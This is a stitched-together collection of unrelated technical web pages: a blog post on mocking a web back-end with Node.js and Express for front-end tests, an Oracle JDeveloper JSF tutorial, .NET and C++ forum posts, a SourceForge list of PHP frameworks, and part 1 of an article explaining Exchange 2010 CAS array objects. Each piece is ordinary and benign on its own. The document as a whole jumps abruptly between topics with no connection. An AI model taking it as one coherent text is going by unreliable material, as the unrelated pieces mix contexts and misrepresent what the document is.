Mock the back-end of your web application, using Node.js, to make developing and testing the front-end easier.

Recently, I’ve worked on a couple of front-end projects where the back-end doesn’t actually exist (yet). No problem, of course - assuming the API is reasonably well defined (i.e. not likely to change much), we can quickly build a simple mock back-end and start building the UI against that. When the time comes to make the real back-end available, it should be a simple task to swap it over.

Not just throw-away code

We don’t want to spend time building software only to throw it away again a short time later. Fortunately there are a number of other advantages to having a simple mock of the back-end:

- Developers don’t need to install and maintain everything needed to run the real back-end (e.g. .Net/Java development environment, databases etc).
- Developers can work on new features where API support is not ready.
- Developers can tweak the API responses to develop less-used behaviour (error handling or restricted users).

Testing

End-to-end tests run against a mock of the back-end (ok, so not quite end-to-end) can be much more focused than fully end-to-end tests. A real back-end’s responses change based on pre-existing state (e.g. changes in the database), but the mock can always respond the way the test expects. The tests should know exactly what is displayed on screen and what actions can be taken, so they should be much less brittle and require less maintenance.

If the testing framework can start and control the mock back-end, then it can also precisely control responses from the API, and verify that the API gets invoked with the correct parameters and payload. Of course, this doesn’t eliminate the need for fully integrated end-to-end tests, but it can be a good way to create a more complete set of tests for the front-end.
Example project

I’ve created a suitably contrived project as a demonstration, intended to be as simple as possible while still showing the capabilities. It is a web application that lets users do simple calculations, maintaining the current value as state to use as part of the next calculation. Hence, the server has persistent state that could cause end-to-end tests to interfere with each other. The full project is Mock-Api-Blog on GitHub, so please refer to that for the full code sample. The ReadMe also explains how to run the application and example tests. In this blog I’ll try to pull out interesting snippets to keep things simple.

A Node.js mock server

I wanted to make it nice and easy to add API-like modules, so I’ve created a simple pattern where each module exports its root path (under /api/), and an Express Router that implements all the API methods (GET, POST etc).

```js
export const path = '/operators';
export const router = express.Router();

router.get('', (req, res) => {
  // GET /api/operators
  send(req, res, { operators: Object.keys(maths) });
});
```

Handling POST requests and parameters is also easy:

```js
router.post('/:id', (req, res) => {
  // POST /api/operators/{id} with the operator parameter in the body
  const { id } = req.params;
  const { operator } = req.body;
  // ...
});
```

Next, we can wrap all the API modules up together in an API router:

```js
import * as operators from './routes/operators';
import * as domaths from './routes/do-maths';

const routes = [operators, domaths];

// Add the route for each API
routes.map(route => {
  this.router.use(route.path, route.router);
});

this.router.use('/*', (req, res) => {
  // Fallback if none of the APIs match
  res.status(404).send('Not Found');
});
```

Finally, we need to pull the API router into the Node Express server, under the path /api/. I’m using a simple proxy function here, which will make it easy to replace all the APIs with new ones at the beginning of each test, without having to stop and restart the server.
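The snippets in this post rely on small `send` and `error` helpers that aren't shown in these extracts. As a rough sketch only - the real project's helpers may differ - they could look something like this (the function names come from the snippets; the bodies here are assumptions):

```javascript
// Hypothetical helpers assumed by the route snippets in this post.
// send: reply with a JSON payload and a 200 status.
// (The real project exports these from a shared module.)
function send(req, res, payload) {
  res.status(200).json(payload);
}

// error: reply with an HTTP error status and a message body,
// as used by the error-handling test later in the post.
function error(req, res, status, message) {
  res.status(status).send(message);
}
```

Both match the usual Express response API (`res.status(...).json(...)` / `res.status(...).send(...)`), which keeps the route modules free of response-formatting boilerplate.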
This will help to avoid any state interactions between tests. In the code example below, globalApi is replaced by a new instance of the API router whenever a new Api() is created.

```js
// Setup the API mocks
app.use('/api', (...args) => {
  // This allows us to easily reset the /api routes without restarting
  if (globalApi.router) {
    globalApi.router(...args);
  }
});
```

The tests

When I bundled the APIs together, I wrapped them in an Api class, so that whenever a new Api() is created, it effectively resets all the back-end state. This is crucial to the testing, because we want each test to get a “clean” version of the back-end, and not depend on which other tests have run first.

While the tests can make use of the default mock APIs, we also want to be able to override specific URLs with behaviour that is custom for that test. The Api class does this too. In my test setup I can do something like this:

```js
// Spy on the POST request
let postStub = sinon.spy((req, res) => send(req, res, { value: 10 }));

beforeEach(async () => {
  // Reset the API and override the GET and POST for the /api/domaths endpoint
  new Api()
    .get('/domaths', (req, res) => send(req, res, { value: 13 }))
    .post('/domaths', postStub)
    .start();
  await loadPage('', By.css('.App-maths'));
});
```

As you can see, the override for the GET request will always return { value: 13 } for these tests, so the test can verify that the correct information is displayed. The override for the POST request uses a spy, so that at the end of the test we can verify that POST was indeed called, and with the correct parameters.
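The Api class itself isn't shown here - see the GitHub project for the real implementation, which builds an Express Router and installs it as globalApi. As a minimal sketch of the reset-and-override idea (names and structure are assumptions, and Express is replaced by a plain route map to keep it self-contained):

```javascript
// Minimal sketch of the Api class's reset-and-override behaviour.
// The real project assigns an express.Router to globalApi; here a
// hypothetical route map and handle() method stand in for the router.
class Api {
  constructor() {
    // A fresh instance starts with no overrides - this is the "reset"
    this.routes = new Map();
  }
  get(path, handler) {
    this.routes.set('GET ' + path, handler);
    return this; // chainable, as in the beforeEach above
  }
  post(path, handler) {
    this.routes.set('POST ' + path, handler);
    return this;
  }
  start() {
    // The real implementation would install this instance as globalApi here
    return this;
  }
  // Stand-in for Express routing: dispatch a request to an override,
  // or mark it not-found (like the fallback 404 route)
  handle(method, path, req, res) {
    const handler = this.routes.get(method + ' ' + path);
    if (handler) handler(req, res);
    else res.notFound = true;
  }
}
```

Because each test constructs a brand-new instance, no override (or accumulated server state) can leak from one test into the next.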
```js
// Initial value should be displayed
expect(await getElementText(By.css('.App-value'))).toBe('13');

// Input a number and submit
await setInputValue(By.css('.App-input'), '3');
clickElement(By.css('.App-submit'));
await driver.wait(until.elementLocated(By.css('.App-maths.calculated')));

// Verify the correct information was in the POST request
expect(postStub.called).toBe(true);
const postBody = postStub.firstCall.args[0].body;
expect(postBody.operator).toBe('+');
expect(postBody.input).toBe('3');
```

Lastly, we can also get the API to throw errors, to test the error handling in the front-end:

```js
beforeEach(async () => {
  new Api()
    .post('/domaths', (req, res) => error(req, res, 500, 'My Test Error'))
    .start();
  await loadPage('', By.css('.App-maths'));
});
```

Summary

This simple mocking setup makes life easier for front-end developers. There's no need to wait for the real API to be ready, and no need to spend time installing and setting up all the tools necessary to run the real back-end. It allows for some very specific front-end testing, without any of the usual problems associated with changing state. You’ll still want to create some end-to-end tests that leverage the real back-end and test integration, but this can take the pressure off some of the more complicated UI behaviour.
https://blog.scottlogic.com/2018/03/20/mock-the-backend-with-node.html
Next you will register the Java class as a managed bean in faces-config.xml. Then you will design a simple UI using two input text fields and a button, and bind the input fields and button to the managed bean using JSF EL expressions. Finally you will hook up the button to a method in the managed bean that will invoke the business method when the button is clicked.

Enter JSFBeanApp as the application name. Accept the defaults and click Finish. In the Application Navigator you can collapse and expand any panel. You adjust the size of panels by dragging the splitter between two panels. To group and sort items in the Projects panel, use the icons in the panel's toolbar.

In the Create JSF Page dialog, enter Register.jsf as the file name. Make sure Facelets is the selected document type. Pages can be created from several places: the New Gallery, the JSF navigation diagrammer, or the ADF task flow diagrammer (available only in the Studio edition of JDeveloper).

On the Page Layout page, select Blank Page. On the Managed Bean page, select Do Not Automatically Expose UI Components in a Managed Bean. Click OK. By default JDeveloper displays the new JSF Facelets page in the visual editor.

If you choose not to let JDeveloper use automatic component binding at page creation time, you can use the Property Inspector to manually bind any component on the page.

When you create a new JSF page as a Facelets document type (with file extension .jsf), JDeveloper automatically creates a starter page structure with two xmlns attributes for the JSF Core and JSF HTML tag libraries. The other elements included in a starter file are elements for laying out a page, specifically everything else within <f:view> and </f:view>.
For example, the following code is generated for the new page:

```xml
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<f:view xmlns:f="http://java.sun.com/jsf/core"
        xmlns:h="http://java.sun.com/jsf/html">
  <html xmlns="http://www.w3.org/1999/xhtml">
    <h:head>
      <title>Register</title>
    </h:head>
    <h:body>
      <h:form></h:form>
    </h:body>
  </html>
</f:view>
```

When you complete the steps for creating a JSF page, the Application Navigator should look something like this, with the folders and files in the project conforming to the Java EE Web module directory structure.

In the Application Navigator, right-click the project you just created and choose New > General > Java Class, then click OK. In the Create Java Class dialog, enter the class name as PersonInfo. Accept the default values and click OK.

The example you are creating requires a user to enter data in two fields and then click a button to display a message. To capture the data, you need to add two properties and create getter and setter methods for them. Later you will add a method to save the input data and display a message using the data.

In the source editor, add code to create a simple JavaBean object. For example, after the generated code:

```java
public PersonInfo() {
    super();
}
```

Add two properties to PersonInfo, for example:

```java
private String username;
private String email;
```

When generating the accessors, make sure public is selected in the Scope dropdown list, then click OK. In the source editor, add code to retrieve the data that is entered and then display a message using the data. For example, after the generated method:

```java
public String getEmail() {
    return email;
}
```

Add the following method:

```java
public void saveInfo(String name, String mail) {
    System.out.println("saving..." + name + " " + mail);
}
```

Click Save All to save your work. In the Application Navigator, you should see PersonInfo.java in the project1 package in the Application Sources folder.

Instead of a plain JavaBean, other business services you could use include: Oracle ADF Business Components (available only in the Studio edition of JDeveloper), Enterprise JavaBeans (EJB), and Oracle TopLink, which helps to map your Java classes and EJBs to database tables. To work with a specific business service, you can open the New Gallery and use the provided wizards and dialogs to create or, in the case of web services, expose the entities in your model project.

In the Application Navigator, double-click faces-config.xml to open it in the editor window. The resources your application needs are specified in the JSF configuration file, faces-config.xml. The resources an application might need include: managed beans, custom message bundles, and custom validators and converters.

Select the Overview tab at the bottom of the editor window to use the overview editor. By default the Managed Beans page is shown on the overview editor. Click to open the Create Managed Bean dialog. Enter personData as the bean name. Then click next to the Class Name field to open the class browser. Enter PersonInfo in the field and then select PersonInfo (project1). Click OK to close the class browser. In the Create Managed Bean dialog, select Configuration File. Then verify you now have the expected values entered or selected, and click OK. You should see the new managed bean definition in the overview editor.

You can configure the faces-config.xml file either by editing the XML in the file manually, or by using the overview editor for configuration files, which provides creation dialogs and browse features for finding class file references for your beans. To define a managed bean in faces-config.xml, you add an entry to the JSF configuration file, giving a symbolic name that you will use to refer to the bean and specifying the bean's class and scope.

Using managed bean annotations reduces the size and complexity of the faces-config.xml file, which can grow quite substantially. When you use annotations, instead of adding a <managed-bean> element in faces-config.xml, JDeveloper adds the annotations @ManagedBean and @RequestScoped in the JavaBean class file. For example:

```java
@ManagedBean(name="backing_mypage")
@RequestScoped
public class MypageInfo {
    ...
}
```

If you instead use faces-config.xml to configure a managed bean, JDeveloper automatically updates the faces-config.xml file for you with the necessary configuration elements. For example:

```xml
<managed-bean>
  <managed-bean-name>personData</managed-bean-name>
  <managed-bean-class>project1.PersonInfo</managed-bean-class>
  <managed-bean-scope>request</managed-bean-scope>
</managed-bean>
```

When the JSF application starts up, it parses faces-config.xml and the managed beans are created as needed.

In the editor window, select the Register.jsf tab at the top to bring the page forward. In the visual editor, type the text Registration Form at the top of the page. In the Component Palette, select HTML from the dropdown list and then expand the Common panel. Click and drag Table to the visual editor, then drop it on the page to add a table. In the Insert Table dialog, set the number of rows to 3 and the number of columns to 2. Accept the other default values and click OK. In the Component Palette, select JSF from the dropdown list and then expand the HTML panel. Two tag libraries are available: the JavaServer Faces HTML tag library, which contains tags representing common HTML user interface components, and the JavaServer Faces Core tag library, which contains tags that perform core actions such as event handling and data conversion.

Drag and drop Input Text on the first row, second column of the table.

To select the entire table, place the cursor at the bottom right corner of the table border, and click when the table selector icon appears. To select rows, place the cursor on the left border of the table and click when the row selector icon appears. To select columns, place the cursor on the top border of the table, and click when the column selector icon appears. To select cells, click in a single cell or press Ctrl and click in multiple cells. To resize a table, drag the resize handles to the desired size. To resize a row or column, place the cursor at its border and click when the horizontal border handle or vertical border handle appears.
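Pulling the pieces above together, the finished PersonInfo bean might look something like the following. This is a sketch: the accessors JDeveloper generates may be formatted differently, and the JSF annotations are omitted here (the tutorial registers the bean through faces-config.xml instead), so the class compiles standalone.

```java
// Sketch of the completed PersonInfo bean described in this tutorial.
// Declared public in the tutorial's project1 package; shown here without
// the optional @ManagedBean/@RequestScoped annotations, since the bean
// is registered in faces-config.xml.
class PersonInfo {
    private String username;
    private String email;

    public PersonInfo() {
        super();
    }

    // Generated accessors for the two properties
    public String getUsername() { return username; }
    public void setUsername(String username) { this.username = username; }

    public String getEmail() { return email; }
    public void setEmail(String email) { this.email = email; }

    // Business method: writes the submitted data to the console
    public void saveInfo(String name, String mail) {
        System.out.println("saving..." + name + " " + mail);
    }

    // Action method bound to the command button's action attribute;
    // returning null keeps the user on the same page
    public String commandButton_action() {
        saveInfo(this.username, this.email);
        return null;
    }
}
```

With the bean registered as personData in request scope, the EL expressions #{personData.username} and #{personData.email} resolve to the two properties, and #{personData.commandButton_action} resolves to the action method.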
Click Background Color to apply a color to the selected table, row, or cell. Click Left, Center, or Right to apply the respective alignment to a selected table. Click Indent or Outdent to add or remove indentation from the selected table by applying or removing the <blockquote> tag.

Drag and drop another Input Text on the second row, second column. Drag and drop Command Button on the third row, second column. In the visual editor, click in the table cell of the first row, first column, and type Username:. Then type the label for the second field in the second row, first column. The visual editor should now look similar to the following.

A PropertyResourceBundle is backed by a properties file, a plain-text file containing translatable text. A properties file can contain values only for String objects. If you need to store other types of objects, use a ListResourceBundle instead. When Automatically Synchronize Bundle is selected, after you enter text in the visual editor and press Enter, JDeveloper displays the text as an EL expression. JDeveloper also creates the properties file. For example:

# SOME_TEXT=Some Text

Help information is provided for each component, explaining its purpose and its attributes. To find such information, right-click an item in a panel in the Component Palette and choose Help.

Component values are referenced with the #{expression} syntax of the JSF Expression Language (EL). For example, #{personData.username}. When you add a component to the JSF page, the Property Inspector displays the supported attributes for the component tag, grouped into categories.

In the visual editor, select the first input text field. Then in the Property Inspector, Common section, choose Expression Builder from the dropdown menu next to the Value field. In the Expression Builder, expand JSF Managed Beans, then expand personData. Select username to create an expression using the username variable. Repeat the procedure on the second input text field, selecting the email variable in the Expression Builder this time.
In the visual editor, double-click the command button to open the Bind Action Property dialog. In the Managed Bean dropdown list, select personData. Accept the default values in the dialog and click OK. JDeveloper displays the Java class file in the editor window, showing the code added for you when you bound the command button component.

Bean properties can be bound to component values or component instances. In the example, you bind the bean properties to component values using the Expression Builder, binding the input components' value attributes to the username and email bean properties. The command button component can be bound to methods in JavaBeans. The Bind Action Property dialog enables you to bind the button's action attribute to a new method that you will create next in the JavaBean.

On the Register.jsf page, if you click Source to switch to the XML editor, you will see something like:

```xml
<h:inputText value="#{personData.username}".../>
<h:inputText value="#{personData.email}".../>
<h:commandButton action="#{personData.commandButton_action}".../>
```

If necessary, select the PersonInfo.java tab in the editor window to bring the source editor forward. In the generated action method, add code to call the business method saveInfo that you previously added to the bean. Recall that the saveInfo method takes two parameters and writes the data to the console. So, for example, after the comment line in the generated code:

```java
// Add event code here...
```

Insert the following code shown in bold:

```java
// Add event code here...
saveInfo(this.username, this.email);
return null;
}
```

When you run a JSF application in the IDE, JDeveloper automatically deploys and starts it, and the data you entered will be written to the Log window in JDeveloper. For example, if you entered guest and guest@oracle.com, you should see the following message at the bottom of the Log window:

saving...guest guest@oracle.com

To stop the application, click the terminate button. Note: Terminating the application stops and undeploys the application from Integrated WebLogic Server, but it does not terminate Integrated WebLogic Server.
- Use JDeveloper wizards and dialogs to create applications, starter pages and starter Java classes - Use the JSF configuration editor to register Java classes as managed beans - Use the visual editor, Component Palette, and Property Inspector to create UI pages - Use Integrated WebLogic Server to run a JSF application
http://docs.oracle.com/cd/E18941_01/tutorials/jdtut_11r2_33/jdtut_11r2_33.html
I would like to write an IErrorHandler implementation that lets me map back to the type of the throwing class. If I can map back to the type of class that originally threw the exception, I could look for a custom error-handling attribute that would allow me to customize error-handling behavior for the current error. Is this possible? If so, how do you map back to the class that originally threw the exception? Thanks.

View Complete Post

I want to check user credentials against the ASP.NET Membership database, but while using the Membership class it throws "Operation is not valid due to the current state of the object".

Hi, I am trying to set an integer value in a class from license information, and then get that value passed back to my Program.cs class (e.g. a value of 10). However when I try to return the value to another part of the class (as below) it says 'Cannot implicitly convert type to Manco.Licensing.License'. Also, any idea how I call this class to get this integer value back to Program.cs, i.e. should this be LCheck.Value.days? In this class daysleft is an integer value.

```csharp
using System;

public class LCheck
{
    private Manco.Licensing.License m_License;
    public static int daysleft;
    public static int days;

    public int Value
    {
        get
        {
            int days = daysleft;
            return days;
        }
    }

    public Manco.Licensing.License License
    {
        set
        {
            m_License = value;
            daysleft = Convert.ToInt32(m_License.DaysLeft.TotalDays);
        }
        get
        {
            return daysleft; // this is the line the compiler complains about
        }
    }
}
```
http://www.dotnetspark.com/links/42949-use-ierrorhandler-to-map-back-to-throwing.aspx
Hot topics in Frameworks Software: sistema academico php mysql, sistema de ventas php, gambas 3, base de datos, control de activos fijos

- ActiveRules - ActiveRules Social Site Application Server
- Open Framework - database editor with dynamic interface and report builder.
- ToKo framework - ToKo is a webpage development framework in PHP 5, whose aim is to quickly and easily develop small webpages like personal websites and pages of small companies. It follows the OOP paradigm and uses AJAX.
- AJAXia Project
- Adminia System - a framework to help PHP developers make administration modules for their web sites. The general idea is to provide a simple and light-weight framework that can be used in about five minutes per administrative section.
- PHP stdlib - A project to bring elements of the std namespace from C++ to PHP 5.3. It will include common C++ includes (cstdlib, cmath, etc) as well as several classes derived from the STL (containers, iterators, algorithms, etc).
- Grappelli - The Web framework for perfectionists with deadlines (who can't use Python). Grappelli aims to be functionally equal to, and as easy to use as, Django for Python. It is a complete rewrite and rework, since PHP struggles in areas of object orientation.
- KwikPHP - KwikPHP is a PHP library designed to give developers access to many common libraries and configuration scripts for those libraries right off the bat. Examples of common libraries include Smarty and ADOdb, though any library can be used with KwikPHP.
- kTemplates - PHP simple template engine. Has a metalanguage for blocks, iterations, conditionals, etc. Manages caching of results. It should be fast.
- Mods Base - Mods Base makes it easier for users to install, update, disable/enable or remove mods. For developers, Mods Base makes it easier to create mods for both phpBB 2.0.x and Olympus.
- Picara Framework - Another open source web development framework written from scratch in PHP
- NeverForms - NeverForms is a collection of classes that helps with HTML form manipulation. The project interfaces MySQL tables to an HTML form. The purpose is to provide abstraction of the database schema from the PHP code. Some inspiration came from Ruby.
- ScaffuHH web application framework - A framework to generate simple web based applications, with all HTML code generated 100% in conformance with W3C standards.
- Nette - Nette is an event-driven and component-based framework for rapid web application development using PHP 5. Brings you the familiarity of developing desktop GUI applications with tools such as Borland Delphi or ASP.NET.
- Bionic! CMS, first intelligent CMS - This project is developed as the very first intelligent CMS in the world - a fully adaptable and very user-friendly CMS / eshop, primarily built for performance because of a unique system of site-side caching.
- CMV Framework - Extremely simplified yet powerful PHP coding framework that aims at being easy to use as a building block for other systems such as CMSes (Content Management Systems) or standalone. It provides a basic MVC framework to build upon.
- Simple Rapid Application Development - The Srad framework for PHP5 provides an easy way to create and manage object-oriented web-based applications with PHP5, ADOdb, Ajax and the Smarty template engine.
- Pandora Feeds for WordPress - A plugin for displaying RSS feeds in WordPress themes.
- NuCore - A system that allows bloggers to use richly decorated HTML templates with a basic CMS built in, allowing them to use highly artistic blogs instead of just the available themes.
- QLSinfonia - Visual tool for the symfony PHP framework
https://sourceforge.net/directory/development/frameworks/language%3Aphp/?sort=update&page=5
Type: Posts; User: jeffrey@toad.net

Hi Chuck, I know this is a bit late... Windows 2000, VC++ 6.0 and no SDK gets the same results. If I install the latest SDK (March 2006), I get a Link Error 1103 - LNK1103 - UUID library is...

Hi All, Has anyone done this before? I need to set up a DSN through a setup program so the users will not have to (and get elevated rights). It would be the information contained in the Data...

Hi, Peek() is a member of istream. Google is your friend. Jeff

Hi,
IServerInfo* pNewServer = NULL;
HRESULT hr = pNewServer->CoCreateInstance(__uuidof(ServerInfo));
if(SUCCEEDED(hr))
{
    // Populate COM object properties here...
    // Now Fire Event...

Hi, Does VS2003 have an .ncb file? If so, rename it and open the project (solution) again. Jeff

Hi diehardii, I'm not sure string::str() is guaranteed to return a NULL-terminated string. Try using string::c_str() instead. It does return a NULL-terminated string. See...

Hi, FindFirstFileEx takes 6 parameters. Are you confusing it with FindFirstFile? Jeff

Hi, Have you looked at MSDN? Jeff

Hi Mike, Thanks. I could not get you any points - I have to spread them around. It's funny the system does not allow me to rate the same people over and over (considering they are helping me...

Hi, #include "stdafx.h" should be the very first include in a source file (*.cpp). Jeff

Hi, See if you are smashing your buffer. Comment out the following:
char buffer[MAX_CHANNEL_NAME];
memset( buffer, 0x0, MAX_CHANNEL_NAME );
//channels->Get(i,&pChanEncontrado);
...

Hi draqula, If you want to study the algorithms, see Knuth's The Art of Computer Programming, Seminumerical Algorithms. If you want an implementation, I prefer Crypto++. An implementation of...

Hi All, I'm looking for a solid Ping class. Does anyone know of a good download? I can't get my boss to spring for IPSentry or What's Up Gold, so I'm going to try to roll a basic monitor. ...
Hi yinkou, The following should also work (I've used it during scripting, but I like the long file names also).
C:\>dir /X
Volume in drive C has no label.
Volume Serial Number is 58AC-2403...

Hi, Add an assert to snap the debugger:
Array(long Size = 0)
{
    if(Size < 0) Size = 0;
    ASSERT( Size > 0 );
Also, an n element array is indexed 0 to n-1.
_T& operator[](long ID) const
{
    if(ID < 0 || ID > p_Size) ID = 0;
    return(p_Array[ID]);
}

Hi Mitsukai, Though the following is legal C++, it blows up in M$'s implementation (at least in the VC++ 6.0 era):
p_Array = new _T[p_Size = Size /*=0*/];
Jeff

Hi All, Thanks for the responses. I tossed out points where the system would let me (SuperKoko: sorry - I'm told I have to spread them around). In the end, I see I left out an important...

Hi Graham, Basically - I do a lot with MFC. Below is probably more helpful...
CString s;
CryptoPP::Integer n;
s << n;
SetEditWindowText( IDC_EDIT_MODULUS, n );
Then,

Hi Rantech, has samples on fork/exec. See Chapter 8 examples, 'Process Control'. If pid == 0, you're in the child. Simply do it recursively. I crashed a...

Hi All, I'm using a library (Crypto++) which defines an Integer (arbitrary size). The Integer class defines operator<<. I find that I have to continually copy and paste conversion code to...

Hi, I've never tried it, but SetFont() on the constituent controls of the Combo Box. See Microsoft KB article Q174667. Jeff

Hi ahoodin, Setting Breakpoints When Values Change may be useful for you. Jeff

Hi WU, You may also want to read a bit about First and Second Chance Exceptions. Jeff
http://forums.codeguru.com/search.php?s=8f50e37dccda4ef00c09f69f2f47f5ba&searchid=5104319
Everyone confused? Nice. Let’s try to fix that as best we can by going through each of these one at a time. You'll see some server names throughout this article, so why don’t I show you what I’m working with in my lab first? OK, let's dig in!

A CAS array object performs no load balancing. It's an Active Directory object used to automate some functions within Exchange, and that's all. Exchange 2010 documentation says all over the place that it's recommended to use load balancers (LB) to load balance CAS traffic. So what do I mean by saying the CAS array object performs no load balancing? What you're actually doing with a load balancer is balancing traffic across a pool of CAS - or perhaps you could call it an array of CAS - but not the CAS array object itself. The difference is subtle yet distinct; perhaps we didn’t make the names distinct enough to help prevent the confusion in the first place.

The primary reason, and perhaps the only reason, a CAS array object exists is to automatically populate the RpcClientAccessServer attribute of any new Exchange 2010 mailbox database created in the same Active Directory site (as the CAS array object). The RpcClientAccessServer attribute is used to tell Outlook clients during the profile creation process what server name should be in the profile. That’s pretty much it folks; there's no more magic going on here, and once you've created your CAS array object it's simply an object in Active Directory - there's zero load balancing going on at this point in time. The rest is up to you, including configuring the load balancing itself. The CAS themselves have no idea there is any load balancing happening.

You may also be confused by what can be seen after creating a CAS array object using the New-ClientAccessArray cmdlet or viewing a pre-existing CAS array object using the Get-ClientAccessArray cmdlet.
Here I'm creating a new CAS array object in my lab with the Name CASArray-A, the FQDN of outlook.lab.local, and in the Active Directory site very aptly named Site-A. Figure 1: Creating a Client Access array First of all my FQDN and Name fields don’t match because the Name is a display name - it's purely cosmetic. It's whatever you want to name it so you know what that CAS array object is being used for. The FQDN is the record you must then create in DNS or else clients will never be able to resolve it to an IP address to connect to. At this point, I’ll remind you that there can be only one CAS array object per Active Directory site. So why is the Members property populated with two CAS immediately after creation? Didn’t I tell you there's no load balancing going on at this point? It looks kind of like I lied to you doesn’t it? To be honest, the Members property is a touch misleading. If you didn’t read up on the steps to create a CAS array object you may think you’re done at this stage. You created your CAS array object and you can see two CAS have automatically joined the array. By this time you may be off for a celebratory drink or going down cube-town hallway to steal some cookies from this guy. Not quite yet my friend! Due to the fact that we associated the CAS array object to Active Directory site Site-A, the cmdlet simply goes and finds all Client Access servers registered as residing in Site-A and then lists them in the Members column. I like to tell customers to think of this column as the Potential Members column or as my colleague Kamal Abburi, another PFE here at Microsoft, suggests it's the Site CAS Members column. You can add these Client Access servers as nodes in your load balancing solution because they all reside in the same Active Directory site. But until the load balancer is configured we have no load balancing. How did the cmdlets know what site the CAS are in? 
Well, I’m glad you asked, because we get to break out everybody’s best friend AdsiEdit.msc and dig down into the Configuration partition of Active Directory to find the magic beans.

Figure 2: The msExchServerSite attribute of an Exchange 2010 server contains the Active Directory site the server resides in

Each Exchange server has an msExchServerSite attribute that contains the Active Directory site it currently resides in. In case you're wondering, yes, it's dynamically updated if you move an Exchange server to a new site and the Microsoft Exchange Active Directory Topology service has a chance to run and update a few things. But the AutoDiscoverSiteScope attribute (part of Get/Set-ClientAccessServer) will not be dynamically updated, and you may have funky Autodiscover results until this is fixed - depending on your site, server, and client layout.

Let’s go back for a moment to what a CAS array object actually does. It populates the RpcClientAccessServer attribute of an Exchange 2010 mailbox database, which is then used to tell Outlook where it needs to connect when using RPC (over TCP). For Outlook Anywhere (HTTPS) clients, it indicates where the traffic that leaves the RPC-over-HTTP proxy needs to connect on the client’s behalf in order to reach their mailbox.

So what services does the Outlook client attempt to connect to when using RPC (over TCP)? First Outlook connects to the CAS array object on TCP/135 to communicate with the RPC Endpoint Mapper in order to discover the TCP ports the RPC Client Access and Address Book services are listening on. That’s it for RPC (over TCP) mode! Outlook Anywhere (aka RPC over HTTP) clients connect to the RPC-over-HTTP proxy component on TCP/443 on a CAS by resolving the Outlook Anywhere external hostname, or what the Outlook profile calls the proxy server.
Interesting geeky side note for anyone interested, Outlook automagically and quietly adds /rpc/rpcproxy.dll to the server name specified, as that’s really what it needs to connect to, but if we asked people to type these names in, like we used to back in Outlook 2003 days, can you imagine how many would have missed it, or got it wrong?) Traffic is routed out of the RPC-over-HTTP proxy to the appropriate MAPI/RPC endpoint using a list of hard-coded, rather than dynamically assigned TCP ports, those being TCP 6001, TCP 6002, and TCP 6004. The Outlook Anywhere external hostname is purposefully not the same FQDN as the CAS array object and I’ll explain why later on. A client may also make HTTPS connections to services such as Autodiscover, OAB downloads, EWS, POP, or IMAP, but these services are defined by entirely different methods such as virtual directory URLs or the AutoDiscoverServiceInternalUri value. None of these additional services are serviced by the CAS array object as none of them are using RPC, although it’s likely to be the same server they are connecting to. The CAS array object’s FQDN may share the same VIP as the other service’s URLs, but we strongly recommend the CAS array object FQDN not be the same as the other services’ URLs if split DNS is in use. More on that last recommendation later. This is a very common misconception usually spawned due to the item directly above. SSL certificates in the realm of this article are only utilized when we want to do something like establish an SSL-protected HTTP session. Because RPC (over TCP) is not an HTTP session, it's not going to be protected with SSL and therefore, we don't need the CAS array object's FQDN to be included on the subject name list of the SSL certificate. Let's take a look at it. Below is Outlook 2010 in MAPI/RPC mode connected to an Exchange 2010 CAS array object. 
Figure 4: Outlook 2010 RPC (over TCP) connections to Exchange 2010 CAS We can see it has made one directory and two mail connections. In the netstat output (overlaid above the screenshot) we see the machine has made one endpoint mapper connection (TCP 135) to the CAS array object, as well as connections to TCP 59531 and TCP 59532, which represent the statically assigned TCP ports for the MSExchangeRPC and MSExchangeAB services respectively in this lab. From the server side we can see the services listening using the command netstat -n -b. Figure 5: Services Outlook needs to connect to when using RPC (over TCP) As expected, it shows that none of the services are being contacted over HTTP (TCP 443). This is why you don't need the CAS array object FQDN on the SSL certificate. The belief that you need the CAS array FQDN on the SSL certificate is sometimes reinforced by the way Outlook displays connections while in HTTPS mode, as seen below. Figure 6: Outlook Anywhere connections This time we see Outlook 2010 had made two mail connections and a Public Folder connection when the screen shot was taken, and we can also see we are using HTTPS. From within Outlook it looks as if we are connected to outlook.lab.local and E2K10-MLT-01.lab.local, which we are, sort of, but utilizing netstat once again we see we are actually connected to the RPC-over-HTTP proxy located at webmail.lab.local on TCP/443 (HTTPS). Outlook always displays the server it is ultimately connected to for data, whether directly or via the RPC-over-HTTP proxy. If you're wondering why we see six connections via netstat instead of three, it's because HTTP is a half-duplex protocol and we therefore establish an RPC_DATA_IN and an RPC_DATA_OUT channel for each connection seen inside Outlook. You may also be thinking, "Wait! Outlook 2007 and 2010 encrypt RPC sessions by default!
We have to have the name on the cert!” Wrong-O my friends because the encryption setting you see below utilizes RPC encryption and has nothing to do with SSL. The communication is still happening over RPC and not over HTTPS. Figure 7: When connecting using RPC (over TCP), Outlook uses RPC encryption Simple isn’t it! If a CAS array object met a Certification Authority and the CA said: “Hey man you really need me! C’mon I’ll sell you a swanky wildcard cert on the cheap!” the CAS array object would simply reply “Honey badger don’t care!” and probably use the CA to crack open a pistachio. Now that's of course if you followed our recommendation to use a different FQDN for the CAS array object than you’re using for the other service FQDN(s). Yes, I’m getting to why… I hope Part 1 of this article has been helpful to you so far in making sense of some common misunderstood issues with CAS array objects, and hope that you’ll tune in for Part 2 at a later time where we'll cover the remaining three common misconceptions about CAS array objects. Brian Day Premier Field Engineer, Messaging Continue to Demystifying the CAS Array Object - Part 2. LOL, I know the URL that defines the name of the CAS Array object doesn't need SSL, but I have included it in a SAN certificate before without even thinking about it. I am sure alot of people do that. As long as you are opening port 443 on the LB then no harm. Atleast it was an internal CA and it didn't cost me any money. I meant not opening port 443 on the LB. @AA, Part-2 will help complete the picture but generally the very same LB will also have TCP/443 open for everything non MAPI; OWA, ECP, EAS, OLA, EWS, etc... Great article. If you were bringing up two stand alone multi-role servers in a site (CAS/HT/MB) and you wanted to start using a CAS array but did not have any load balancer in place yet, could you just add an A record for each server using the CAS array name? 
